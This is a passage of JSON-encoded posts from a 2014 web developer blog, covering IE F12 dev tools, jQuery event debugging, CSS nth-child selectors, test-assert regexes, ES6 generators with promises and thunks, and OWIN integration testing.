03 Apr 2014 00:00:00 +0000", "tags": [ "javascript", "f12", "internet-explorer" ], "description": "A look at the JavaScript console improvements in the F12 tooling refresh", "content": "One of the new features in the F12 refresh is some updates to the JavaScript console so let’s have a look at those updates.\nconsole.logI’ve previously complained about how the console.log method in IE doesn’t like it when you pass an object to it, it just outputs [object Object] meaning it just executed a toString on the object.\nI can happily confirm that this has been fixed! When you pass an object, multiple objects or formatted strings it operates as it does in the other browser dev tools.\n$_If you’ve used other browsers dev tools there’s a chance you’ve come across $_. This variable is added by the dev tools which represents the result of the last expression. This can be useful when running through execution stacks and you’re not capturing output, particularly when you’re running through the debugger.\nMinor improvementsThere’s another few things which are fairly minor and not particularly obvious such as:\nThere’s now a button on the Console toolbar which you can prevent the console being cleared on each request. By default this turned on, meaning the console will be cleared on each request. There’s obvious performance impacts by turning this off as the dev tools are maintaining state Under the Internet Explorer settings there is now a property you can set which will enable the console even when F12 isn’t active. This setting is off by default as again it can be a performance hit so it’s worthwhile only turning it on as-needed ConclusionThat wraps up our look at some of the new features related to the style editor in Internet Explorer’s F12 tools. If you’ve got any feedback make sure you ping the @IEDevChat twitter account and let them know. Also don’t forget to checkout modern.ie to get trial versions of Windows with Internet Explorer.\n", "id": "2014-04-03-f12-refresh-the-javascript-console" }, { "title": "F12 Refresh - The JavaScript Debugger", "url": "https://www.aaron-powell.com/posts/2014-04-03-f12-refresh-the-javascript-debugger/", "date": "Thu, 03 Apr 2014 00:00:00 +0000", "tags": [ "javascript", "debugging", "f12", "internet-explorer" ], "description": "A look at the JavaScript console improvements in the F12 tooling refresh", "content": "One of the new features in the F12 refresh is some improvements to the JavaScript debugger so let’s have a look at those updates.\nSource maps\nHaven’t heard of source maps? Well then you should start here, but basically source maps are a way to provide debugging information from generated JavaScript output, either generated from a transpiler or from a minifier.\nOver the last 12 months in particular source maps have really taken off and they can really make it easy to solve problems without needing the direct sources, which as a .NET developer this is something that I’ve grown up using.\nI’m excited that this has been included in the F12 refresh which has just dropped. By default they are turned on when you’re in the script debugger so you immediately start debugging your original sources rather than the generated sources and having to opt into source maps:\nIn the above I’m debugging the source of a website called font dragr by @ryanseddon which is an AngularJS app that was minified with UglifyJS2 which is a minifier that will generate a source map for the minified file. You can see in the source list there it multiple files listed, but if you look at the HTML only a single JavaScript file is served, named scripts.js. So far it seems there are a few issues still, the breakpoint positioning can be a bit iffy (as you can see above) and debugging doesn’t seem to track variable names properly so the locals and console will respond to the minified name rather than the original. I asked the F12 team about this and apparently it’s to do with a limitation in the source maps spec, there’s not enough data to map the variable names so it’s something we’re stuck with at the moment.\nThere’s a few other nice things about the source maps implementation, there’s a button on the toolbar which will allow you to swap between original and “decompiled” sources, so if you don’t know what the generated variable name is you can swap to the original source, turn on pretty print and look at it before going back to the source map debugger.\nThey’ve also included some syntax highlighting for popular transpiler languages like CoffeeScript and TypeScript to make the debugging experience nicer. If you’re using other languages, say Traceur or Sweet.js, you’ll just lack syntax highlighting for the debugger. Also when you have source maps turned on the search will search the source mapped code, not the original source.\nJust My Code debuggingHow many times have you been debugging JavaScript and had this happen:\nYep you’ve accidently clicked Step Into and found yourself inside jQuery/AnguarJS/etc which you now want to get back out of because you’re not really wanting to debug these libraries. You go to swap back up the callstack to your code but get the breakpoint wrong and continue past where you were trying to debug anyway.\nWell with the F12 refresh there is a really cool new feature which allows you to make script files as library files and when they are marked as such these scripts will be skipped by the debugger! They’ll also be hidden within the callstack as external code so you can see that your call has gone through code which is outside your control.\nTo enable this feature you need to open the list of scripts (Ctrl + O) and then click the option on the scripts you want marked as a library and ignored. As you can see above it will avoid any step-into calls you try and do and even run all the way through if you have no more code that isn’t marked as library code at the end. This can also be combined with source maps to skip over decomplied libraries.\nOther minor improvementsThere’s a few small improvements that are easy to miss, like the fact that breakpoints and watch variables are now remembered when you close the dev tools. Or that the console understands the debugging context and has autocomplete on what’s in scope.\nConclusionThat wraps up our look at some of the new features related to the style editor in Internet Explorer’s F12 tools. If you’ve got any feedback make sure you ping the @IEDevChat twitter account and let them know. Also don’t forget to checkout modern.ie to get trial versions of Windows with Internet Explorer.\n", "id": "2014-04-03-f12-refresh-the-javascript-debugger" }, { "title": "Introducing status.modern.ie", "url": "https://www.aaron-powell.com/posts/2014-04-03-introduction-status-modern-ie/", "date": "Thu, 03 Apr 2014 00:00:00 +0000", "tags": [ "internet-explorer" ], "description": "Introducing a new website to help track the development status of features in Internet Explorer", "content": "Today there was an exciting announcement from the IE Dev relations team, the team behind IE Dev Chat and modern.IE. At Build they announced a new website to help developers track progress of features, status.modern.ie.\nThis website is similar to the Chrome Status dashboard where web developers can get an insight into what is happening with feature development.\nThrough status.modern.ie we can see what features the IE team is considering or has under development already, or features that are currently not being pursued.\nFor example we can see they are developing cross-domain font loading or that the Battery Status API is something that they are considering. You can also see what version a particular feature dropped in IE along with links to the relevant documentation.\nAs a web developer and someone who is passionate about IE it’s create to see the IE team starting to become more open in their progress, giving us an insight into what features they are considering for upcoming versions of IE. Hopefully this is a sign of changes to come and IE team continues down the path of being more open with what their road map is.\nSo go check out status.modern.ie and if you’ve got in feedback get in contact with myself or ping @IEDevChat on twitter.\n", "id": "2014-04-03-introduction-status-modern-ie" }, { "title": "Debugging jQuery events", "url": "https://www.aaron-powell.com/posts/2014-03-06-debugging-jquery-events/", "date": "Thu, 06 Mar 2014 00:00:00 +0000", "tags": [ "jquery", "debugging", "javascript" ], "description": "Ever had an event firing from jQuery but you don't know where in your code they are firing from?", "content": "Every couple of months I see a question come around where someone has a jQuery event handler that’s being fired but they don’t know where that is in their codebase.\nSo your first stop is the browser dev tools but then you hit something like this:\nWell crap, that’s not particularly helpful, it just shows us something in jQuery, and if I’m using a minified version of jQuery well then I’m really in trouble, it won’t be easy to debug at all.\nOk that’s not really helpful now is it, it’s not showing my event handler, it’s showing me something from jQuery internals.\nThe why To understand why we’re not seeing our event handler we need to understand a bit about how browser events work. Originally you were only able to attached a single event handler to any given DOM element, and that was like this:\nelement.onclick = function () { ... }; Before we had addEventListener everywhere jQuery gave us a way to add multiple events, by attaching its own event handler and capturing your listeners into an array so that when the event does fire it can loop over them all and trigger them.\nDebugging the unknown Right-o so our event handlers are hidden away behind a wrapper that triggers them from a generic function, that could pose a problem couldn’t it?\nConveniently jQuery offers a bit of a backdoor into its internals which we can leverage for this purpose, and that’s $._data.\nIt’s worth pointing out that $._data is an “internal” jQuery API which is undocumented, it might be removed one day so use it with caution.\nThis method takes 3 arguments, but for our purpose we’re really only interested in the first, which is a DOM element. Not that this is a DOM element and not a jQuery element, passing in a jQuery element will not yield the results you desire.\nFun fact, to get to the DOM element from a jQuery selector access its array index - $('.foo')[0].\nNow, calling $._data will return us an object, like so:\n$._data(document.getElementById('myElement')); // -> { events: { ... }, ... } There’s a bunch of properties on this returned object but the one we’re interested in is the events property. This property is an object that has properties representing all the event handlers which you have attached, so something like this:\n{ events: { click: [] } } From this array we now have access to all our click handlers, they’ll look something like this:\n{ data: null, guid: 1, handler: function () { ... }, namespace: "", needsContext: undefined, origType: "click", selector: undefined, type: "click" } Awesome, there’s your event handler, it’s on the handler property, copy that text and search your codebase for it.\nActually debugging Right so we’ve found our event handler, or at least a text version of it, it’d be better if we could actually step into it, find out which file we’re coming from. Wouldn’t it be cool if we could insert breakpoints?\nWe can do that with some tricks:\n(function () { var element = $('.selector')[0] var clicks = $._data(element).events.click; clicks.forEach(function (click) { var handler = click.handler; click.handler = function () { debugger; handler.apply(this, arguments); }; }); })(); Do you see what we’re doing from our simple function? We’re:\nGetting all our click handlers and looping over them Capturing the original handler into the handler variable Creating a new handler which uses the debugger keyword to attach a JavaScript debugger Using apply to invoke the handler with the expected arguments Now we get a breakpoint which we can step into our event handler with!\n", "id": "2014-03-06-debugging-jquery-events" }, { "title": "What I learned about nth-child selectors", "url": "https://www.aaron-powell.com/posts/2014-03-12-what-i-learned-about-nth-child-selectors/", "date": "Thu, 06 Mar 2014 00:00:00 +0000", "tags": [ "css" ], "description": "Today I learned something important about the `nth-child` CSS selector that seems to be a common misconception.", "content": "Today I learned an interesting fact about how the nth-child CSS selector works and it was different to what I expected and what seems to make sense.\nI had the following HTML snippet:\n<div class="input-group"> <div class="legacy"> <div class="input-subgroup"> <input name="itemId" id="Type0" type="radio" checked="checked" value="1"> <label for="Type0">Single</label> </div> <div class="input-subgroup"> <input name="itemId" id="Type1" type="radio" value="2"> <label for="Type1">Couple</label> </div> <div class="input-subgroup"> <input name="itemId" id="Type2" type="radio" value="3"> <label for="Type2">Family</label> </div> </div> <div class="new"> <div class="input-subgroup"> <input name="somethingElse" id="somethingElse" type="text" maxlength="2" placeholder="Enter" value=""> </div> <div class="input-subgroup"> <input name="somethingElse2" id="somethingElse2" type="text" maxlength="2" placeholder="Enter" value=""> </div> </div> </div> And I wanted to find the input[type="radio"] at a particular position in the DOM.\nSo I started with this snippet:\nvar group = document.getElementsByClassName('input-group')[0]; var couple = group.querySelectorAll('.legacy input[type="radio"]:nth-child(2)'); And was confused when that didn’t work, I’m wanting to find the 2nd radio button, and that reads right, it’s the 2nd radio button under the class="legacy" element, so it makes sense… Right?\nBut I was missing a point, that it’s the nth-child and in my DOM input[type="radio"] isn’t actually a child of class="legacy", it’s a descendant so what I’m really after is nth-descendant, which isn’t a real selector.\nThe fix It’s a pretty easy fix if you know your DOM, change the selector to:\n.legacy :nth-child(2) input[type="radio"] Since we know that the radio button is in the nth-child(2) of .legacy and we are properly locating the children based on their position.\nYou can see the broken one here and the working one here.\n", "id": "2014-03-12-what-i-learned-about-nth-child-selectors" }, { "title": "Easily replacing Assert.IsTrue statements", "url": "https://www.aaron-powell.com/posts/2014-02-12-easily-replacing-assert-istrue-statements/", "date": "Wed, 12 Feb 2014 00:00:00 +0000", "tags": [ "unit-testing", "testing" ], "description": "It's time to really address that annoying habbit of developers to use `Assert.IsTrue` in their tests.", "content": "I blogged/ranted about Assert.IsTrue previously, well today I decided to work out a quick way to do bulk conversions of tests.\nWell the easiest way to go about this is using a good old Regular Expression:\nAssert\\.IsTrue\\((?<Actual>.*)\\s*==\\s*(?<Expected>.*)\\) That’s a regex which is ideal for using from Visual Studio, or any other tool that supports named capture groups. If you don’t have something like that you can use numerical capture groups:\nAssert\\.IsTrue\\((.*)\\s*==\\s*(.*)\\) Now for the replace regex:\nAssert.AreEqual(${Expected}, ${Actual}) Or for numbered capture groups:\nAssert.AreEqual(${2}, ${1}) Or maybe you’re using NUnit and want to use Assert.That (which some people argue is more readable), try this out:\nAssert.That(${Actual}, Is.EqualTo(${Actualy})) Bonus, adding messages As a friend of mine, Jason Stangroome pointed out you might also want to include a message to the assert for additional information when it’s failing, so we’d update our regex like so:\nAssert.AreEqual(${Expected}, ${Actual}, "${Actual} was expected to have th evalue of " + ${Expected}) This will add the name of the variable we are asserting.\n", "id": "2014-02-12-easily-replacing-assert-istrue-statements" }, { "title": "Cleaning up promises with yield", "url": "https://www.aaron-powell.com/posts/2014-01-28-cleaning-up-promises-wit-yield/", "date": "Tue, 28 Jan 2014 00:00:00 +0000", "tags": [ "javascript", "es6" ], "description": "Previously we looked at cleaning up callback hell with thunks and generators, but in this post we'll look at the next approach to managing callbacks, Promises, and how we could clean that up with generators.", "content": "Last time we cleaned up callback hell with yield but callbacks in the design which I was talking about are not all that common these days, especially if you’re working in the browser. When you’re in the browser there’s a good chance you’re going to be working with Promises, and more accurately Promise/A+.\nIf you’re unfamiliar with Promises, it’s a specification which is states that you have an object which exposes a then method which will either fulfill or reject some operation. You’ve probably come across it with AJAX requests:\n$.get('http://jsbin.com/ikekug/1.js').then(function (data) { //do something with the successful response }, function (err) { //do something with an error }); So libraries like jQuery provide a Promise API (well, it’s not exactly Promise/A+) or there’s dedicated libraries like Q. Even my db.js exposes a Promise-like API, so it’s pretty common a thing to find around the shop.\nWith the proliferation of Promises the question is, could we clean the up Promises like we did with thunk’ed functions? Basically getting us back to doing this:\nvar getData = function* () { let data = yield get('http://jsbin.com/ikekug/1.js'); console.log(data); }; Reimplemeting getIn the last post we had a get method which did our AJAX query, so we’ll start with that:\nlet get = function (url) { var xhr = new XMLHttpRequest(); xhr.open('GET', url); xhr.addEventListener('load', function (e) { var o = JSON.parse(xhr.responseText); }); xhr.send(); }; But now we need to make it use a Promise. There’s heaps of different Promise libraries which we could leverage, or we could leverage the native browser support for Promises! But be aware that this is super bleeding edge and it really doesn’t have great support yet, but bugger it we’re already using bleeding edge so why not go further!\nlet get = function (url) { return new Promise(function (fulfill, reject) { var xhr = new XMLHttpRequest(); xhr.open('GET', url); xhr.addEventListener('load', function (e) { if (xhr.status == 200) { var o = JSON.parse(xhr.responseText); fulfill(o); } else { reject(Error(xhr.statusText)); } }); xhr.send(); }); }; Right, now we can do something like this:\nget('http://jsbin.com/ikekug/1.js').then(function (data) { console.log(data); }); So we’re returning a new Promise instance from the browser and for that promise we have the contents of our get method from earlier. Once this completes we either fulfill the promise, because it was successful, or reject it on an error.\nReimplementing runnerNow we need to reimplement our runner function, previously it assumed that the function to be yielded was a thunk, but this time it’s not, so we need to refactor it to make it understand how to do the promise, and to deal with the fulfill/reject pipeline which it uses.\nlet runner = function (fn) { let cont = function (method, arg) { }; let it = fn(); let fulfilled = cont.bind(this, 'next'); let rejected = cont.bind(this, 'throw'); return fulfilled(); }; Ok here’s our method skeleton, I’ve got a cont function (which use to be called next) which will be used to handle stepping through the iterator’s next method, but I’m actually creating a wrapper around it which contains either next or through as the first argument (method). So why are we doing this? To understand that we need to look at how cont works:\nlet runner = function (fn) { let cont = function (method, arg) { var result; try { result = it[method](arg); } catch (e) { return Promise.reject(e); } if (result.done) { return result.value; } return Promise.cast(result.value).then(fulfilled, rejected); }; let it = fn(); let fulfilled = cont.bind(this, 'next'); let rejected = cont.bind(this, 'throw'); return fulfilled(); }; Here’s our fully reimplemented runner method which includes the cont method completed. Because we’re creating “wrappers” around the cont method using Function.bind we’re able to use the exact same method for both stepping through to the next iteration, or raising an error (more on Function.bind check out my previous post).\nLet’s walk through what happens:\nThe runner starts up, creates our iterator, creates our wrappers and then invokes fulfilled This invokes the cont function with the method argument equaling next The expression it[method](arg) is really it['next'](arg) which is the same as it.next(arg) Sweet, by using bind we can choose what method on the iterator to invoke, either next or throw.\nContinuing down the assumption that we’re using next, we wrap this in a try/catch, if the call fails we then immediately reject a Promise. Using the Promise.reject method means we’re creating a promise that can only fail.\nAssuming that that was successful we do our check for the iteration being done, and in that case just exiting out of the Promise chain, but if we’ve got a continuation point we’ll create a yet another Promise using Promise.cast, which will either create a new promise or if result.value was a promise it’ll return that, and from here we’ll then provide the same fulfilled and rejected functions so that it will step into the iteration again. This call to Promise.cast is important because what we’re doing is ensuring that we can deal with Promise chaining. Once of the nice things about Promises is that they return a Promise, so we can do .then().then().then() and so on.\nNow when we’ve got an implemented runner method which will go and execute our Promise-base yield.\nConclusionToday we’ve looked at the other approach to solving callback hell, Promises, and how we can combine that with the new approach to doing asynchronous programming in JavaScript through generators.\n", "id": "2014-01-28-cleaning-up-promises-wit-yield" }, { "title": "Cleaning up callbacks with yield", "url": "https://www.aaron-powell.com/posts/2014-01-18-calling-up-callbacks-with-yield/", "date": "Sat, 18 Jan 2014 00:00:00 +0000", "tags": [ "javascript", "es6" ], "description": "We'll continue our exploration into the new `yield` and have a look at how it can be used to avoid the so-called callback hell which can plague JavaScript applications.", "content": "In my last post we took a journey on how to make a function execute in a delayed fashion by using the new yield keyword coming in ES6. But we were still working with what was essentially a synchronous code path, we just used yield to halt its execution. By the end of the post we used setTimeout to buffer our execution time, making it asynchronous in its execution.\nBut the fact of the matter remains this is still synchronous code that we’re dealing with and in JavaScript synchronous programming isn’t the only way we worked, much of what we do is asynchronous. This can lead to what is commonly referred to as callback hell and it’s the bane of JavaScript developers everywhere.\nNow there’s a number of different ways which you can tackle this, Promises being one of the popular options. I’m not going to talk about Promises in this post though, I just want to focus on the raw problem of callbacks.\nLet’s go with the following as our baseline code:\nvar getData = function* () { let data = yield get('http://jsbin.com/ikekug/1.js'); console.log(data); }; That’d be nice and clean code if we could get to it now wouldn’t it? And if we think about how it works it wouldn’t seem that difficult to achieve would it? As we learnt last time the right hand side of the yield statement gets evaluated in one next() call and we can pass the result of that through to the following next() call to do a left-side assignment.\nImplementing getI’m going to not use any JavaScript library for doing our AJAX get, I’m going to do it raw like I talked about it here.\nSo our get method would look like this:\nlet get = function (url) { var xhr = new XMLHttpRequest(); xhr.open('GET', url); xhr.addEventListener('load', function (e) { var o = JSON.parse(xhr.responseText); }); xhr.send(); }; Hmm something about this doesn’t look right, how are we getting the value of o back out of the callback handler for load? Well we need to return something so that it can be returned from the next() call, but returning something from get wouldn’t make sense, it’s actually the value from the load callback that we want, but we can’t return from there either as it’d be a different scope, so what can we do?\nThunkThe problem is we need to be able to return a value from inside a callback, and really the best way for us to do that is to change how we write our function, we’re going to have to make a Thunk. Now our function will look like this:\nlet get = function (url) { return function () { var xhr = new XMLHttpRequest(); xhr.open('GET', url); xhr.addEventListener('load', function (e) { var o = JSON.parse(xhr.responseText); }); xhr.send(); }; }; Well that didn’t really change anything did it. So why did we introduce a thunk?\nExecuting our generatorSo far in all of the examples I’ve walked through we’ve executed our generator functions by either the use of a for-of statement, or by iteratively calling next(). In a real-world scenario this is a bit less than ideal isn’t it, after all to call next() you either have to keep checking if it’s done, or know exactly how many times to call next(). What would be better is if we had something to take care of that for us.\nLet’s get started:\nlet runner = function (generateor) { }; Now this runner function won’t get a generator itself, it will just be able to handle generators. Ultimately what this function will do is take a function (which is assumed to be a generator) and handle the calls to next, passing the correct value until it’s done. So what’s the best way to do that? We could do a while loop like we used in the last post? Well that won’t work with the asynchronous problems we’re trying to solve because we’ve got no way to grab that return value if we try and be synchronous.\nSo what’s the solution to that, a recursive function:\nlet runner = function (generator) { let next = function (arg) { }; let it = generator(); return next(); } Here what I’ll be doing is:\nCreate a function that will handle calling next, imaginatively named next\nGet the iterator\nStart the recursion\nlet next = function (arg) { var result = it.next(arg); };\nEach time through next we’ll capture the result of the iterator’s next call, taking the argument from when it was last called and pass it through to the iterator. Also this takes care of the fact that you can’t call an iterator for its first iteration with an argument, which we can achieve by passing null.\nlet next = function (arg) { var result = it.next(arg); if (result.done) { return; } next(result.value); } And now our function will run through all steps of an iterator quite happily as a recursive function, but still we’re not dealing with asynchronous operations. Well this is where our Thunk will come in, we’ll check if the return type is a function. But more than that we’ll pass the next function as the argument to our Thunk:\nlet next = function (arg) { var result = it.next(arg); if (result.done) { return; } if (typeof result.value == 'function') { result.value(next); } else { next(result.value); } }; For this to work we better go update our Thunk:\nlet get = function (url) { return function (cont) { var xhr = new XMLHttpRequest(); xhr.open('GET', url); xhr.addEventListener('load', function (e) { var o = JSON.parse(xhr.responseText); if (cont) cont(o); }); xhr.send(); }; }; So what’s going on here?\nWhen yield get('...') is called it will return a function as result.value result.value is received by our recursive function and detected to be a function Control over when the iterator will continue is up to our Thunk The important point to note is the last point, we hand over continuation control to our asynchronous operation. Let’s look at another way we can use this:\nlet sleep = function (ms) { return function (cont) { setTimeout(cont, ms); }; }; runner(function* () { console.log('start'); yeild sleep(1000); console.log('end'); }); Does that make sense, our Thunk receives a function to execute when it is done. This can be executed immediately or this could be executed after an asynchronous operation completes. We can also pass an argument to it which is our return value from the yield statement.\nAnd finally we can make our generator like this:\nlet fn = function* () { let data = yield get('http://jsbin.com/ikekug/1.js'); console.log(data); yield sleep(1000); data = yield get('http://jsbin.com/ikekug/1.js'); console.log(data); yield sleep(1000); cosole.log('done'); }; runner(fn); ConclusionToday we’ve had a look at how we can solve the problem of callback hell by the use of ES6 generators, in a fashion that reminds me very much of C#’s async/await.\nWe’ve seen that with a little change to the way we write functions, by introduction Thunks, we can create functions which can be used in a continuation manner.\nBonus code One of the first places I see generators being used is in Node.js (you can use it in Node.js 0.11.x with the --harmony flag) since you only have a single JavaScript engine to deal with. Also the Node.js APIs are written pretty close to what we’re executing already, so with a few tweaks we can take our runner function into Node.js:\nlet runner = function (fn) { let next = function (err, arg) { if (err) { return it.throw(err); } var result = it.next(arg); if (result.done) { return; } if (typeof result.value == 'function') { result.value(next); } else { next(null, result.value); } } let it = fn(); return next(); } let thunker = function (fn) { var args = [].slice.call(arguments, 1); return function (cont) { args.push(cont); fn.apply(this, args); }; }; We could then do something, like reading folders:\nrunner(function* () { var contents = yield thunker(fs.readdir, 'node_modules'); console.log(contents); }); ", "id": "2014-01-18-calling-up-callbacks-with-yield" }, { "title": "Functions that yield multiple times", "url": "https://www.aaron-powell.com/posts/2014-01-13-functions-that-yield-mutliple-times/", "date": "Mon, 13 Jan 2014 00:00:00 +0000", "tags": [ "javascript", "es6" ], "description": "Generator functions in ES6 don't have to just do a single `yield`, they can `yield` multiple times, but when doing so how do you execute those functions?", "content": "I recently introduced you to JavaScript generators which I think are a really interesting feature that we should look at for the future of JavaScript. In that blog post I was talking about LINQ in JavaScript and kind of glanced over an important part of generators, and that’s how you use them if you’re not using a for-of loop. While generators make a lot of sense in the scope of managing datasets that isn’t their only usage, in reality generators are quite useful if you want to lazily execute any function.\nEager functionsBefore we dive into lazy functions let’s talk about eager functions. What do I mean when I say something is an eager function? Let’s take the following function:\nvar ticTacToe = function (size) { console.log('Shall we begin?'); var blank = '-'; var board = [ ]; for (var width = 0; width < size; width++) { board[width] = [ ]; for (var height = 0; height < size; height++) { board[width][height] = blank; } } var area = size * size; var findMove = function () { var base = Math.trunc(area / 10); var move = Math.trunc(Math.random() * (base + 1) * 10); return move; }; var playMove = function (player) { var move = findMove(); while (move > area - 1) { move = findMove(); } var row = Math.trunc(move / size); var segment = board[row]; move = move - (row * size); if (segment[move] === blank) { segment[move] = player; } else { return playMove(player); } }; var printBoard = function () { var boardLayout = board.reduce(function (str, segment) { return str + segment.join(' ') + '\\n'; }, '\\n'); console.log(boardLayout); }; var players = 'XO'; for (var i = 0; i < area; i++) { playMove(players[i % players.length]); } console.log('Game over'); printBoard(); var rowWinner = board.filter(function (row) { var first = row[0]; for (var i = 1; i < row.length; i++) { if (row[i] !== first) { return false; } } return true; }); if (rowWinner.length) { console.log('The row winner was...', rowWinner[0][0]); } }; Ok so what we’ve got here is a very crappy automated tic-tac-toe game, it just randomly places the X and O on the board (of what ever size you want) and occasionally someone wins (but generally not). While how this code works is not particularly interesting (and to be honest I’ve just whipped it up quickly while on an international flight, so it’s not my best code!) what it represents is interesting, it represents something happening that could be time consuming, but more importantly it’s something that you kind of want to watch unfold. If you run this code the game is immediately completed because this is an eager function, it executes, you wait for it do be done and only then can you see what’s happened; there’s no way to pause the game at a particular point and see it in action. Alternatively if we took the code a bit further and added a simple AI to it each move would take subsequently longer than the last one to play as the program works out where would be the best place to play its move.\nNow that’d be less than ideal, it might seem like our game has frozen, and as soon as a user believes that we’ve really shot ourselves in the foot.\nThis is the problem of eager functions, we start them and we have to wait for them to finish, even if we are concerned they are taking too long. There are JavaScript design patterns you can leverage to get around this, splitting a function up over setTimeout or requestAnimationFrame, but these can be hard to implement as your function has to know what is/isn’t acceptable for its execution duration.\nLazy functionsSo hopefully you’ve got a bit of an idea what an eager function is, if you run the above code you’ll see it can take a while, especially when you make the board size large (so far no game as been won at 20x20, and it kept having recursion errors above that). What’d be nice is if we could pause the game at any point and see what the board looks like, but the function doesn’t know to stop, it just keeps executing line after line until there’s no more lines of code to execute.\nWell this is where a generator function comes in. Let’s start really simple:\nvar fn = function* () { console.log('start'); yield console.log('doing'); console.log('done'); }; So what do you think would happen when you run that function?\nfn(); Well nothing happened, we got no console messages logged out. Ok, that’s not true something did, we created a new iterator instance from our function because generators are iterators. So to actually do something we need to capture the iterator:\nlet iterator = fn(); Right so still nothing observable has happened and that’s because we haven’t moved through our iterator. To do that we call the next method on it:\niterator.next(); Now we’ll see this in our output:\n"start" "doing" Notice that we’ve output start and doing but not done. Here’s were we have gotten to making a lazy function and our function has run as far as we’ve told it to run. There might be more to the function, we’ve just put it on hold. If we were to call next again we’d have the final console.log statement executed and the function would complete as there’s no more yielding to be done.\nKnowing your iterator is done It’s all well and good in our example up there to know that we need to call next() twice because we know the make-up of the function, but what if we didn’t? How would you know when you stop calling next()?\nConveniently the next() method will tell you that, it returns an object like so:\n{ value: value|undefined, done: true|false } By looking at the done property of this object we can work out whether there are any more steps to be executed. In fact this is what the for-of loop does, in fact for-of can be decomposed to look like this:\nvar x; while (!(x = it.next()).done) { } You might be thinking “well wouldn’t you just use the for-of loop then?” and that’s a good question, the for-of loop nicely takes care of stepping over each yield and executing them.\nControlling yielded values Not every instance of using yield will be for the purpose of yielding statements, sometimes you might want to yield a value. Here’s a slightly updated version of our function from above:\nvar fn = function* () { console.log('start'); yield console.log('doing'); let x = yield 1; console.log('done', x); }; Alright, so a for-of loop can walk that for us right:\nfor (var x of fn()) { //do nothing } Outputs:\n"start" "doing" "done" undefined Oh, that’s not right, why is the value of x undefined? Well to understand that you need to understand how we yield values, this is part of the returned object from calling next(), so let’s do this:\nconsole.log(it.next()); console.log(it.next()); console.log(it.next()); Now our output looks like:\n"start" "doing" {value: undefined, done: false} {value: 1, done: false} "done" undefined {value: undefined, done: true} Ahh, notice the value: 1 in there, you probably want to do something with that.\nWhat you want to do with it is pass it as the first argument to the next() method call for you see next takes an argument with is the result of the yield.\nLet’s do this:\nit.next(); it.next(); it.next(42); We now get:\n"start" "doing" "done" 42 Wait… but we said let x = yield 1 not let x = yield 42, so why did it use the 42 we passed as an argument rather than the value we actually yielded? Well it turns out that yield doesn’t work that way, what yield does is:\nProvides the yielded value to the iterator Takes the argument provided to next and passes that through to the assignment (or in the case of no assignment it’ll just ignore it) So this gives us the power to manipulate the iterator at any yielded point from the outside, we can set up new values at yielded points, or stop processing the iterator if a particular value is yielded. This is also why for-of doesn’t work, it will call next but not provide any arguments so you can’t yield values for assignment inside of a for-of loop.\nMaking our game lazySo what points during our game do you think we’d want to pause? Maybe when the board has been created (hey, you could make that something to manipulate!) and after each move, that all seems reasonable. Here’s our updated game:\nvar ticTacToe = function* (size) { console.log('Shall we begin?'); var blank = '-'; var board = [ ]; for (var width = 0; width < size; width++) { board[width] = [ ]; for (var height = 0; height < size; height++) { board[width][height] = blank; } } yield board; var area = size * size; var findMove = function () { var base = Math.trunc(area / 10); var move = Math.trunc(Math.random() * (base + 1) * 10); return move; }; var playMove = function (player) { var move = findMove(); while (move > area - 1) { move = findMove(); } var row = Math.trunc(move / size); var segment = board[row]; move = move - (row * size); if (segment[move] === blank) { segment[move] = player; } else { return playMove(player); } return [board, move, move + (row * size), segment]; }; var printBoard = function () { var boardLayout = board.reduce(function (str, segment) { return str + segment.join(' ') + '\\n'; }, '\\n'); console.log(boardLayout); }; var players = 'XO'; for (var i = 0; i < area; i++) { yield playMove(players[i % players.length]); } console.log('Game over'); printBoard(); var rowWinner = board.filter(function (row) { var first = row[0]; for (var i = 1; i < row.length; i++) { if (row[i] !== first) { return false; } } return true; }); if (rowWinner.length) { console.log('The row winner was...', rowWinner[0][0]); } }; I’m not doing any assignment from the yielded values, you can play with that yourself, but we can now look at the state of the board after each move:\nvar game = ticTacToe(3); game.next(); let [board] = game.next().value; console.log(board); And there we go, we can see the state of the board as we are going along. I’m also using destructuring to get the board out of the value, which is an array.\nNow we can start placing bets on who is likely to win, with the odds getting smaller as the board fills up, by us calling next(). Although it’d be crappy odds to start with since the whole thing is based off a random number generator!\nvar game = ticTacToe(3); game.next(); var done = false; setTimeout(function step() { let obj = game.next(); done = obj.done; if (done) { return; } printBoard(obj.value[0]); console.info('place your bets'); setTimeout(step, 5000); }); ConclusionThroughout this post we’ve seen how standard JavaScript functions can have some limitations when their logic is complex and time consuming (or dumb but time consuming). We then took a look at how to use generator functions to make a function lazy so we can step through it at a desired pace. We’ve then seen how to determine when an interator has completed and how we can manipulate the values which we are yielding. Finally we rewrote our initial function to be a generator function and we ran through it in a delayed fashion.\n", "id": "2014-01-13-functions-that-yield-mutliple-times" }, { "title": "Integration testing authenticated Katana applications", "url": "https://www.aaron-powell.com/posts/2014-01-12-integration-testing-katana-with-auth/", "date": "Sun, 12 Jan 2014 00:00:00 +0000", "tags": [ "owin", "katana", "testing" ], "description": "A look at how you can write integration tests with the new ASP.Net Katana project web applications when they are behind an authentication layer.", "content": "Recently I got to work on a project where we were building an ASP.Net WebAPI project for the client. One of the requirements of this project was that the API which we produced was authenticated, basically everything exposed had to be authenticated, and because it was a brand new project we decided to go down the path of WebAPI 2.0 and use the new Katana/OWIN system along with OAuth for the authentication.\nAnother hurdle we had when putting the API together was that it was to sit on top of a legacy system which contained a lot of business logic which was written in a way which we couldn’t unit test, it was very tightly coupled to the database and as our timeline’s didn’t afford us to rewrite it all from scratch we instead opted to rely on integration testing.\nBut that raises an important question, how do you run your WebAPI end-point to be used in the tests? You could:\nStart up IIS Express, like you’re F5-ing from Visual Studio (how we were developing) Deploy to IIS, but then you’re deploying code that hasn’t ticked all the boxes Neither of these were ideal solutions, while IIS Express is ok for development it’s not truly IIS so you’re integration tests are already one step removed from the real environment, meaning they are less accurate. As for deploying to IIS, we deemed that to be equally as risky; you’re either requiring the build server to also have IIS running on it or you’re deploying to another server and then you’ve got to handle the deployments, how do you setup/teardown the IIS instance? Do you do it as part of the test run? Again this was feeling like adding risk that we shouldn’t need to have for preconditions.\nOWIN to the rescueI’ve blogged and presented about OWIN in the past, it’s a really cool concept and this was the first time I was looking to do a production deployment using it, and there’s one feature of OWIN that made it really appealing to solve our problems… Self Hosting.\nBecause OWIN is a separation between your code and the hosting platform your code doesn’t care how it’s hosted, only that it is, so you can go from hosting in IIS to self hosting inside an assembly with very little effort and this is what we were enticed by, through the self hosting we could spin up our API project inside of the test project as a HTTP server and then interact with it via HTTP client requests! AWESOME!\nI’m not going to blog on how to do that, Filip W beat me to it so that solved our 